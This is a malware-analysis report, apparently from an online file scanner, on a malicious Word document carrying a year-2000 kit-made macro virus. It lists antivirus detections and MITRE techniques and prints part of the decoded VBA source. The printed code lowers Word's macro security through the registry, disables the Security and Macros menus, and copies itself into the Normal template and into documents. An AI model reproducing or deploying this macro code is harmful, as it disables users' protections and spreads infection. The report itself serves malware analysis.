MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with multiple signatures, including 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Smvc-2'. It contains VBA macros, specifically a 'Document_Open' macro, which is a common technique for executing malicious code upon opening the document. The presence of these indicators strongly suggests the document is a malicious attachment intended to deliver a payload.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21785 bytes |
SHA-256: 93b0ea0d7af2fd64c24da7518711d9d5a2d5101b4f52e4dd095d5b37aa71beed |
|||
|
Detection
ClamAV:
Doc.Trojan.Smvc-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
' __ __
' | | | |
' _|__|_|__|_ ____ ____ _________ _________ _________ ____ ____ ___ ________
'/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
'| ________| | \ / | | ___ | | ___ | | | | | | | | | | _____/
'| | | \/ | | / \ | | / \ | | | | | | | \___/ | |
'| |________ | | | | | | | | | | |__ __| | |_| | ___ | |__
'| \ | | | | | | | | | | | | | | | | | |
'|______ | | |\ /| | | | | | | | | | | | | _ | | | | __|
' | | | | \/ | | | | | | | | | | | | | | | | | | | |
' ______| | | | | | | \___/ | | \___/ | | | | | | | | | | |____
'| | | | | | | | | | | | | | | | | | | \
'\___________/ \____/ \____/ \_________/ \_________/ \___/ \____/ \____/ \___/ \________/
' | | | | - $MOOTHiE Da HuStla [ZeroGravity]
' |__| |__| - August 15, 2000
'
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'Virus Creation: 10/23/00 9:14:34 PM
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'$* Poly = No $*
'$* Retro = Yes $*
'$* Stealth = High $*
'$* Infection = New $*
'$* Payload = Save $*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Private Sub Document_Open()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = 0
CommandBars("Macro").Controls("Macros...").Enabled = 0
End Sub
Private Sub Document_New()
On Error Resume Next
'Author: $MOOTHiE Da HuStla [Zer0Gravity]
'Name: Sample #2
'Comments: This is a random virus sample
'Origin: USA
'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0
On Error Resume Next: Randomize
Dim XXX1 As Object, XXX2 As Object, XXX3 As Object, XXX4 As Object, XXX5 As Object
Dim YYY1 As Object, YYY2 As Object, YYY3 As Object, YYY4 As Object, YYY5 As Object
Set XXX1 = ActiveDocument: Set XXX2 = XXX1.VBProject: Set XXX3 = XXX2.VBComponents: Set XXX4 = XXX3.Item(1): Set XXX5 = XXX4.CodeModule
Set YYY1 = NormalTemplate: Set YYY2 = YYY1.VBProject: Set YYY3 = YYY2.VBComponents: Set YYY4 = YYY3.Item(1): Set YYY5 = YYY4.CodeModule
AAA = YYY5.countoflines: BBB = XXX5.countoflines: CCC = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)
If AAA < BBB Then
For XXX = 1 To AAA: NT5.replaceline XXX, CCC: Next XXX
For XXX = 1 To BBB: XXXA = XXX5.lines(XXX, 1): YYY5.insertlines XXX, XXXA: Next XXX
NormalTemplate.Save: End If
If BBB < AAA Then
For XXX = 1 To BBB: XXX5.replaceline XXX, CCC: Next XXX
For XXX = 1 To AAA: XXXA = YYY5.lines(XXX, 1): XXX5.insertlines XXX, XXXA: Next XXX
ActiveDocument.Save: End
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.